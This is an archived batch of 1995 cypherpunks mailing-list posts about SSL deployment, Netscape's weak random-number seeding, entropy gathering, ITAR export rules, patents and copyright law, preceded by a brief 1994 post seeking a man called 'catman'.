I am trying to find someone who calls himself catman or catburgler.
In nov. 94 He was serving in Albany County Jail in NY. If anyone has any 
information that may help like his E-mail address, Id really like to hear 
from you...
  My address is below.

**********************************************
Email: rr251070@academ.hvcc.edu
Email alias: Anarchist
At: Hudsen Valley Community College
    80 Vandenburgh Ave
    Troy, NY 12180
----------------------------------------------
Anarchy- A movement to rid society of
   structured government, and to create a 
   system based on co-operation and
   non-violence!
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Wed, 20 Sep 95 22:24:52 PDT
To: "Erik E. Fair" <fair@clock.org>
Subject: Re: Please send me SSL problems...
In-Reply-To: <v02110104ac85a804545b@[204.179.132.1]>
Message-ID: <Pine.SOL.3.91.950921150731.23836F-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



A few commnets from Tim Hudson who has put SSL into telnet and ftp, he is 
not on this list but since he is my personal 'put SSL into applications' 
person (I just write the library :-), I felt his comments would be better 
than mine :-)

On Wed, 20 Sep 1995, Erik E. Fair wrote:
> Jeff, the SSL specification has a severe *architectural* problem - it
> assumes that Internet Protocols are APIs - interface standards, and that
...
> You can't fiddle with a communication protocol without getting agreement
> from everyone about the change, or extend it in a way that is compatible
> with the protocol you're modifying, on a per-protocol basis (e.g. adding a
> TELNET negotiation option to TELNET for encryption, an FTP command to FTP,
> etc). Otherwise, all you've done is made a private, non-interoperable

[tjh]
I agree with this statement - application of SSL at the TCP level for all
communication is possible but *not* desirable in the general case - i.e.
for internet communication.

A much better approach (and the one that I have taken for adding SSL into
TELNET and FTP) is to use *existing* negotiation mechanisms for dynamically
switching on SSL for a given link based on determining dynamically if
the server you are connecting to will support it.

Naturally you want options at both the server and the client that enable
you to:
    - fall back to "normal/insecure" mode if SSL is not available
    - drop the connection in the client if SSL is not negotiated
    - drop the connection in the server if SSL is not negotiated

My aim was when adding SSL (in the form of SSLeay) into an existing server
was *always* to be able to run the *one* server for both the "old" and 
the "new" protocol. I really was getting annoyed at seeing announcements
of yet-another-security package that could be installed that provided 
another potentially insecure access path into the system that only supported
connecting to it with it's own fixed protocol.

SSL can be seen in it simpliest form as just a nice mechanism for 
dynamically negotiating a *cipher* - this is how I initially set things
up so that the "normal" authentication mechanisms had to still be used
for connection - i.e. SSLtelnet still required the normal account password
to get access. This has since been "enhanced" so that you can switch on
an option that uses a certificate exchange as the security 
access mechanism (this is not switched on by default).

For TELNET the "best" place to start seemed to be the work done with
SRATELNET ... it already had all the hooks in the right places for 
using the RFC-defined TELNET extensions that enabled negotiation of 
authentication and encryption. (the documentation that came with SRAtelnet
was also nice and clear too).

For FTP there was a similar was of doing things so I used it too ... and
FTP is a *great* example of a protocol where doing things at the TCP
level (tranparently) would be "bad" - it used two ports ... one of which is
usually dynamically allocated ... and you certainly don't want to 
redo the initial SSL negotiation for each file that you transfer!
(SSLftp reuses the session ID).

Another thing that is worth noting (and worth looking at too) is the
different API offered in SSLREF and SSLeay (... naturally I prefer SSLeay
as I have influence over the author ;-) ... From what I know of the SSLREF
API, it takes the approach of providing wrapper functions that you use
*instead* of the "normal"  functions ... there is (not using the right
names) SSLaccept and SSLconnect that you use that perform the accept() and
connect() along with all the other things required in the SSL protocol
being hidden which sounds nice until you want to do something like FTP ...
where the connection for the DATA socket is formed in the opposite
direction to the CONTROL socket - with SSLeay you do the accept() and
connect() yourself ... as per normal and then run SSL_accept() or
SSL_connect() which does the "logical" SSL stuff ... so in FTP I can do a
connect() and then an SSL_accept() which looks funny but is the "right"
thing to do.  SSLeay has only 2 function calls that operate on socket 
file descriptors, a singe read() and a single write().  The most recent 
version will handle non-blocking IO if the application passes a file 
desciptor with it turned on.  SSLeay does not do a single 
setsockopt(), ioctl(), fcntl(), accept(), bind(), select() etc. 

If you haven't looked at SSLeay or looked and the SSL protocol itself then
you really should grab it and have a read (while ignoring the politics   
and the WWW hype over SSL).

Tim

[eay]
While there are problems with certificate distribution, this will be 
overcome.  Ever tried general inter-realm authentication with Kerberos?

Both SSLref and SSLeay interoperate.  From what I know of the SSLref API, 
our API's are quite different.  Just because SSLref may 'force' you 
towards a particular style of SSL use does not mean the protocol forces 
you to use it this way.

eric
Standard billboard

http://www.psy.uq.oz.au/~ftp/Crypto/
ftp.psy.uq.oz.au:/pub/Crypto/SSL/
ftp.psy.uq.oz.au:/pub/Crypto/SSLapps/

--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 21 Sep 95 15:42:57 PDT
To: cypherpunks@toad.com
Subject: netscape bug
Message-ID: <199509212242.PAA04533@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DF8qC9.4Cw@sgi.sgi.com>, "Vladimir Z. Nuri" <vznuri@netcom.com> writes:

> P.M. notes that anywhere there is a data-driven buffer overflow (which
> he suspects are all over netscape) he can get code to execute anything
> he wants. this reminds me of the
> Morris internet worm that ran exactly the same way. it used a
> bug in the finger demon that caused a string buffer overwrite
> (via strcpy, instead of strncpy) to execute customized code.

> my question: I have not seen the specifics of how this works. does
> this require specialized knowledge of the native machine language on the 
> host machine? or is it just used to cause something like a core dump
> to get a command line or something like that?

I question the accuracy of this.  The fingerd bug was that a string in
the static data area was read in with gets which could be overflowed.
At some point in memory after this input buffer was the string constant
that stored the name of the finger command.  What the Morris work did
was to overflow the input buffer and replace the string constant
"finger" with "csh".  When fingerd then exec'ed the command, that gave
you a shell running on the machine.

While it is certainly true that you can stomp on memory in static
buffers, it's not clear that you can execute whatever code you insert
there.  If the buffer happens to be allocated off the stack (and the
stack grows down) then you can modify the return address.  Of course,
you have to know the address of whatever code you want to execute.  And
that code has to do something useful.  Presumably, if there are two
bugs, one which lets you write over a static buffer and one for a buffer
allocated from the stack, then you could execute code of your choosing.
Of course, that also assumes that you can execute from the data area
which is not always true.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Thu, 21 Sep 95 16:02:11 PDT
To: karlton@netscape.com
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <43psn2$6ug@tera.mcom.com>
Message-ID: <199509212245.PAA15299@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What I would like:
> 
>     Any OS has access to a number of real-world physical sources of
>     randomness. This information is not made available to a user level
>     process. How long did that last seek take? Was there any noise on
>     the microphone? It would be good if the OS could gather that
>     information and make some set of bits available to any process that
>     asks. Having this be part of all OSes would make my job easier.

We've got a *real* hardware random number generator that was developed
for our secure phones.  If you are seriously interested, we can
glue the RNG onto the end of a serial port for you.  It generates
about 8000 bits of uncorrelated noise / second.

Eric Blossom
COMSEC Partners
707-577-0409




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 21 Sep 95 13:00:46 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
Message-ID: <199509211956.PAA20713@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks:
I sent this yesterday, but it appears toad may have eaten it.
Here it is again.
JMR

-----BEGIN PGP SIGNED MESSAGE-----

Ian Goldberg wrote:

<snip>

>>So, any consensus as to whether it's actually illegal to do so?  I
>>remember some disagreement a few weeks ago that AFAIK wasn't resolved.

And Tim replied:

>The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
>of non-Americans," judging by the comments here.

And since _I_ started all this trouble with a private e-mail to Futplex;
I'll now jump in saying again, [IANAL]: "This t-shirt may or may not be
illegal to wear in front of non-Americans," from my reading a while back
of the dense text of this silly law, [I'll spare all of you a quote of
it, but there's text that MIGHT be interpreted that way.]

>The _reality_ is quite different, I think, and the "this shirt is illegal"
>hype is, in my opinion, just that, hyperbole.

I agree with Tim that actual enforcement of this silly a law is unlikely,
especially in Ian's case right now, and *especially* during our US
(election) "silly season," for obvious reasons.

The availability of strong encryption is unlikely to be a major issue
during this election cycle, despite Cypherpunk efforts, and enforcement
of this dumb law would be a "gift" to those of us who think it should be.
[I hope I'm wrong here, but I think you're safe, Ian.:)]

>Even hyperbull, too.

I wouldn't go *that* far, though. Poorly written, ambiguous, statist<g>
laws can be interpreted in any number of ways and for a variety of
reasons having little (or nothing) to do with justice. <sigh>
JMR

<snip>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMGBvrW1lp8bpvW01AQFj1AP8C1RKpayv6V15sTBLiFLWV4tlfWRUuLfm
JVWgeUeHUFxBV1EttbGv30iTmwlCJmBab/wLUag9S57DLZ6Ajed7jQe0rpra56Nl
OgmM1gGU8nJJazYeqiWbYrOc/VSheSqQVLAj+vOoufW8XnU1iFkXQnRziCcyO2Nc
bto4hKBrFWY=
=qlSx
-----END PGP SIGNATURE-----
Regards, Jim Ray

  "People are deceived in masses, but enlightened one at a time."
   -- Dick Boddie.
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 21 Sep 95 16:35:29 PDT
To: cypherpunks@toad.com
Subject: Anyone for testing MOSS?
Message-ID: <199509212335.QAA19745@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I've just gotten TISMOSS 7.1 running (whew!) and wondered if there
was anyone else out there who could exchange encrypted email with me.
Here is my public key:

alias:raph@cs.berkeley.edu
public-key:MFkwCgYEVQgBAQICAgADSwAwSAJBAKQ2qG5eZDa58HpVxM9fpru2hDVVkw0iK
 GC3BMhagHpio7XlGydpkbY3iSV08U92VVbkyTeB2aWhSe2xUUaONPsCAwEAAQ==

   I guess I'll probably wait until next week to test S/MIME.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 21 Sep 95 00:10:32 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: (none)
In-Reply-To: <199509210627.XAA14935@blob.best.net>
Message-ID: <Pine.SOL.3.91.950921165214.28008A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, James A. Donald wrote:
> However the algorithm I described simply used less computation, but the
> overhead of continually doing MD5 is probably modest. 

On a 486DX50 Solaris 2.4 I can do about 40,000 md5's per second.
(if input is < 56 bytes and contiguious).

With an mixing algorithm this fast, you could use it once per 
byte and still have an acceptable RNG.
It is definitly my hash function of choice :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Thu, 21 Sep 95 15:31:49 PDT
To: sameer@c2.org (sameer)
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <199509212030.NAA05084@infinity.c2.org>
Message-ID: <199509212125.RAA00188@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > > I am totally amazed! But think company insiders are probably
> > > supporting the stock.  Holding up better than ascii armor, it is. 
> > 
> > I think it probably has more to do with the fact that the name
> > "Netscape" has been on the front page of every major newspaper in the
> > US.  I guess bad press is better than no press at all.  And the press
> > hasn't even been that bad.

Yeah. Thats the way it works sometimes. I remember back when that
housewife from minnasota launched her media campaign to have "Married
With Children" taken off the air. All it did was make the show a
hundred times more popular and extend its life for years after it
probably would have been canceled on its own.

And the sad part is that now that they have announced that they are
dropping their unofficial Linux support, I really want to hurt
Netscape badly.

Sigh.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 21 Sep 95 14:59:27 PDT
To: cypherpunks@toad.com
Subject: Crypto *import* ban?
Message-ID: <Pine.SOL.3.91.950921174825.6924C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


What exactly does a ban on import of "defense articles and services" 
which are not in "furtherance of world peace" mean?

Could you ban crypto imports?  Imports of chopped liver?


---------- Forwarded message ----------

Here is a final rule issued by ATF regarding the import of "defense articles"
into the United States.  It appears in the Federal Register at 60 FR 47866
(9/15/950).  This becomes a regulation in the Code of Federal Regulations,
Title 27 CFR, part 47, Importation of Arms.

	Sec. 47.52 Import restricitons applicable to certain countries.

	(a)	It is the policy of the United States to deny licenses
	and other approvals with respect to defense articles and defense
	services originating in certain countries or areas.  This policy
	applies to Cuba, Iran, Iraq, Libya, Mongolia, North Korea, Sudan,
	Syria, Vietnam, and the States that comprise the former Soviet
	Union [list of countries omitted].

	This policy applies to countries or areas with respect to which
	the United States maintains an arms embargo [list of countries
	omitted].
        
        It also applies when an import would not be in furtherance of
        world peace and the security and foreign policy of the United
        States.

	[end excerpt]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 21 Sep 95 15:22:52 PDT
To: cypherpunks@toad.com
Subject: real randomness for netscape - user clicking mouse
Message-ID: <Pine.3.89.9509211743.A459-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




Jeff Weinstein <jsw@neon.netscape.com> 
>If anyone has specific suggestions I would love to hear them so that we 
>can do a better job. 

Why not just do something similar to what PGP does?  

For netscape you could have a user make circling motions with the mouse
and clicking at random times.  For each click of the mouse you could get a
few bits of randomness from the time, the X position, and the Y position. 
You could get random bits really fast this way. 

You only need to do this the first time a user uses encryption, or you
might just go ahead and force all users to do this as part of starting up
netscape the first time. On subsequent times you use your encryption
algorithm to make your next seed. 

To be safe you could make up two seeds, encrypt each of them to mix them up 
a bit, and then XOR the results together.  A random bit XORed with a non-random bit 
still produces a random bit.  Actually there is probably a better way to just
encrypt each input whole (padding to block size) and XORing as you go along -
that way you would get whatever randomness was there to be had.  Anyway, do something 
so you have as many or more bits of randomness in your seed as there are bits 
in your key or it will still be a weak link in your security chain.

You could even get the randomness during regular mouse use.  Unless the first thing
a user did was try to use encryption I am sure you would have enough by the
time he did use encryption (keep track).

You must get the random bits from something that nobody else could watch. 
Network packets, process IDs, date, time, etc are not secure.  On the
other hand, an attacker would have to have broken the machine to get the
mouse info used above, in which case netscape would have no security no
matter what. 

   --  Vince

PS  I want a free netscape server site license if you use this idea!  :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 21 Sep 95 18:11:52 PDT
To: cjs@netcom.com (Christopher J. Shaulis)
Subject: Netscape to end Linux support?
In-Reply-To: <199509212125.RAA00188@hoopsnake.cjs.net>
Message-ID: <199509220108.SAA05948@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support, I really want to hurt
> Netscape badly.
> 
> Sigh.
> 
Anyone got a pointer to this announcement?

Damn!  Just when I was starting to like them ...

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 21 Sep 95 18:25:21 PDT
To: cypherpunks@toad.com
Subject: Pitfall in producing random numbers
Message-ID: <ac87c86d0102100466b3@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I think that it was on the cypherpunks list that I learned of how PGP for
the IBM PC, running under emulation on the Mac failed to produce good
random numbers. The virtual PC clock proceeded forward by very predictable
manner. Perhaps the details were different but the nature of the pitfall is
clear. I did not notice that pitfall mentioned in RFC 1750. (Its the only
hazard that I know of that they missed.)

The only thing I can think of protecting against this is to do some simple
checks against more obvious ways that virtual clocks might produce times.
Low order bits should not always be zero. The differences between
successive readings should not be constant. Two clock readings separated by
a computation of known length should be within a factor of a few of the
expected value. If not try again once or twice.

Such tests are imperfect but I think that they would have noticed the
virtual clock on the virtual PC. If they fail the program can require the
user to enter the seed, with all that that entails.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 18:16:54 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*)
Message-ID: <ac875ce446021004e236@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Vlad writes:

>I would *die* to see an op-ed in the NYT with the subject:
>"economic espionage: the new bogeyman decoy after the cold war"

You might want to prepare your memorial service, then, as I recall reading
editorials along these lines back around 1990, when "should the NSA be used
for economic espionage?" was in the news.

Not the exact title of their editorial, but the gist was that turning the
NSA into a spy agency at the beck and call of Ford and Motorola is a bad
idea.

But if you die, Vlad, "the vznuri," at least you have seven other
functioning tentacles.

--Tim May


Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 18:32:43 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
Message-ID: <ac87605c47021004b2c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:02 PM 9/21/95, Michael Shields wrote:
>> There is nothing in the ITAR that refers to ``machine-readable'' so
>> there is no need to interpret that term.
>
>The issue is that it has been formally used as the criterion that
>distinguishes "technical data" from "defense articles".  See Phil Karn's
>CJ requests on the _Applied Crypography_ book and floppy.

Hear, hear! Michael is correct in pointing out that the "machine-readable"
part has indeed been a criterion...if the ITARs in general are unlikely to
withstand scrutiny, then trying to get books banned would really cause
problems.

Also, one of the criteria I recollect is that "systems" were barred from
export, not just algorithms. Algorithms are very widely discussed, even
described in detail in patents. "Cryptographic systems," embodied in
systems, circuits, and specific programs, are not the same as what gets
published in textbooks.

(BTW, I'm glad I can now read the posts of Michael Shields. His MIME PGP
was admirable, in intent, but many of us (from comments here and that were
sent to me) just can't handle whatever MIME configuration he was previously
using.)

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Thu, 21 Sep 95 12:00:37 PDT
To: thad@hammerhead.com (Thaddeus J. Beier)
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
In-Reply-To: <199509210637.XAA11478@hammerhead.com>
Message-ID: <m0svqr4-000DSHC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> Now, this is all expected to change, to become more harmonious
> with the rest of the world.  The changes that I've heard are
> 1) Go to first-to-file instead of first-to-invent
[...]

Does this mean that prior art would no longer invalidate a patent?
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Thu, 21 Sep 95 12:03:13 PDT
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: Munitions shirt (again)
In-Reply-To: <m0svlNY-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <m0svqta-000DWsC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> There is nothing in the ITAR that refers to ``machine-readable'' so
> there is no need to interpret that term.  

The issue is that it has been formally used as the criterion that
distinguishes "technical data" from "defense articles".  See Phil Karn's
CJ requests on the _Applied Crypography_ book and floppy.

<URL:ftp://ftp.cygnus.com/pub/export/>
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Thu, 21 Sep 95 12:38:49 PDT
To: cypherpunks@toad.com
Subject: Fraud Can Flourish Without the Internet
Message-ID: <9509211915.AA28667@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

The New York Times
Letters
Thursday, September 21, 1995

Fraud Can Flourish Without the Internet

To the Editor:
  Your Sept. 19 front-page article on
the discovery by two University of
California graduate students of a
flaw in Netscape, the software used
for purchases over the Internet's
World Wide Web, raises a number of
obvious questions.
  First, who needs high tech to per-
petrate fraud?  Any unscrupulous
commercial employee could use or
sell your credit card number without
employing technology.
  Every time you hand your card to
a waiter in a restaurant, it disap-
pears for several minutes.  The de-
partment store clerks and gas sta-
tion attendants you deal with also
have access to your card number.
How secure is that?
  Ever give your credit card num-
ber over the phone to make a
purchase from a mail-order house?
Or to secure a reservation at
a hotel?  Who's to say that the em-
ployees you're speaking with are
honest?  Or that your phone is no
tapped?  Or theirs?
  I shop on the Internet; I may get
ripped off.  What's my liability?  Fifty
bucks -- sames as the other scenarios
I've described.  That's in my credit
agreement with the card issuer.
  So why all the hoopla?  Is credit
card fraud significantly more preva-
lent on the Internet than in other
modes of purchasing?
  Or is the banking industry whip-
ping up hysteria among purchasers
to curb fraud losses?  Was the work
of those graduate students funded
by someone -- directly or indirect-
ly?  If so, by whom?  A banking
consortium?  A high-tech company
working on some patentable security
scheme?               ROBERT HERRIG
    Peekskill, N.Y., Sept. 19, 1995
The writer is a systems consultant.


DEADBEAT <na5877@anon.penet.fi>
for the I.L.F.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAgUBMGFgp/FZTpBW/B35AQFiuAF/c7DUidkXEe1oBdRpsmfzkXzii44qFPQ3
YQui2lORNA8RUaWiB25poSLFNdiBMJnX
=duqf
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 21 Sep 95 18:38:56 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Prosecution of Cracking Security Systems
Message-ID: <30621328@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> One thing that worries me is that some of the proposed laws about
> intellectual property and enforcment of copyrights may make it illegal to
> try to break the cryptographic protections of systems, even systems one 
has
> control over. (Some similarities to the "no reverse engineering"
> shrink-wrap licenses.)
>
> It's conceivable that Netscape Communications could, under these
> "anti-hacking" laws, seek a prosecution of some future Goldberg and 
Wagner.

Actually, Lehman's report does not recommend this harsh of a measure.  The 
report recommends penalties (some criminal) for tampering with and disabling 
mechanisms that are protecting copyright for protected works, and the 
protected works themselves.  If a hacker operating in the "public service" 
mode you described were tampering with and/or disabling a protection 
mechanism that was applied to their own works, or test patterns and the 
like, they wouldn't fall under the recommended guidlines.  It is pretty 
clear from my reading that you need to have an intent to violate copyright 
(i.e. steal stuff) in order to trigger the penalties.

Who knows how badly Congress will mangle all of this...

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 21 Sep 95 18:53:54 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <306216B6@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



>> Now, this is all expected to change, to become more harmonious
>> with the rest of the world.  The changes that I've heard are
>> 1) Go to first-to-file instead of first-to-invent

Michael Shields wrote:

> Does this mean that prior art would no longer invalidate a patent?

No.  It just moves the prior art date from the date of invention to the date 
of filing the patent application.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 21 Sep 95 02:59:56 PDT
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509210153.SAA25449@Csli.Stanford.EDU>
Message-ID: <199509210958.TAA10764@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Bill Stewart <stewarts@ix.netcom.com>
  and cypherpunks@toad.com, "Jeff Weinstein" <jsw@netscape.com>
  and Christian Wettergren <cwe@Csli.Stanford.EDU>

Christian Wettergren <cwe@Csli.Stanford.EDU> writes:
> Christian (that's me) writes:
> | One wild idea that I just got was to have servers and clients exchange
> | random numbers (not seeds of course), in a kind of chaining way. Since
...
> Bill Stewart answered:
> | Be _very_ careful with this approach - it's the kind of thing that a
> | rogue server or client might abuse to find out randomness or other state
...
> Of course you have to be very careful, as you say. Did you see my
> problem-section in the original letter? I included it above.
... [the referenced section elided by jirib] ...

If I only ever give out a hash of my seed, and only ever *add* any received
info to my seed (and stir it in well), how can anyone find out anything?
(Apart from hash weaknesses.)


The only thing that remains is that I cannot really count on a stranger
to actually give me something truly random. In fact, since at least
one other person knows it, I shouldn't count any entropy from it at all.

However, if I get e bits from each of n servers, and k of them are rogue,
then I have e*(n-k) bits, ie e*n*(1-k/n). With a suitably conservative
estimate of k/n, this should be acceptable.

In any case, accepting donations of entropy cannot possibly reduce the
amount of entropy I have, can it?


As well as the normal servers, there might be dedicated randomness servers
whose sole purpose is to give you a random number. For a toy example, see

  http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/random?ToyRandValue

(where ToyRandValue should be replaced by whatever your random value is).

Again, one would connect to several and stir the results together,
confident in the statistics that say at least one is genuine.

Of course, we then have a chicken-and-egg problem of getting secure
connection to the randomness servers, but we have that anyway. Perhaps each
client could keep a pool of randomness, and whenever it runs low connect
to the randomness servers to re-fill, initially using "type random text".

...
> and that you should only give out approximately the same amount of 
> randomness to the neighbour, as you point out below.
...

I'm not sure I follow this one. Why?

If the neighbour is willing to trust me for more, and cannot possibly
deduce my seed from the numbers ('cause it's a strong 1-way hash),
the only thing it costs me is CPU time - it'd cost me more to keep
track of who asked for how much when.

...
> My approach solves part of the problem of "the observable local
> environment" problem. 
...

Then again, you can always ping. With a well-chosen target, you get
10 bits raw from the first packet... Perhaps about 7 or 8 of actual
usable entropy (and before you flame me, ping melb.dialix.oz.au).


Part of this is that once the sources of randomness are sufficiently
diverse, it's just easier for an attacker to modify your s/w.
Especially if you never throw out your seed, so that all your interactions
since the beginning are unfathomably stirred into your current key.

(Ie I might not mind if I have only 1 bit of entropy per transaction
provided that the total entropy is 128 bits. Provided I never reveal
my seed, of course. This would mean that the value risked on any
particular 128 bits are 128 of my transactions, not just one, but for
most people each of those transactions will involve the same CC number
so it makes no difference anyway.)


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGE3JixV6mvvBgf5AQFcWwP/UMbLaF2IM7y8HAjVUOCRoE4xgp+XkAj9
zQAnd0XnW5nbwqoXJe/WiT/4QQ3Rx/2tV8OhskS1dhy/7WEZ1WtTsEu4Of3YUDJp
rOYf5omToxLVXWNUQrCYUtGUjJo2UdUg2N8NfIR+vXrsZG7HPhfXsrRD9C0W1HJw
yIfcZUzz+s4=
=KJsK
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 19:56:27 PDT
To: cypherpunks@toad.com
Subject: Was the Netscape Flaw Over-Publicized?
Message-ID: <ac8774ca4b0210047fa5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:51 PM 9/21/95, Joe Tardo wrote:

>I can really empathize with what the developers at Netscape must be going
>through, but the 'social good' of raising security flaws to the level of the
>front page of the NYT is hard to deny.  Rather than saying "security through
>obscurity is bad" you can point to a precedent of the consequences of being
>found out.

Furthermore, Ian Goldberg's message on Sunday night was a factual,
unsensationalized report of something he and Wagner discovered. The very
essence of objective reporting, I thought.

That so many reporters found it a newsworthy, even headline-worthy, story
is related to other factors.

--Tim May


Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 21 Sep 95 20:18:02 PDT
To: cypherpunks@toad.com
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft (fwd)
Message-ID: <ac87e6a600021004df72@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


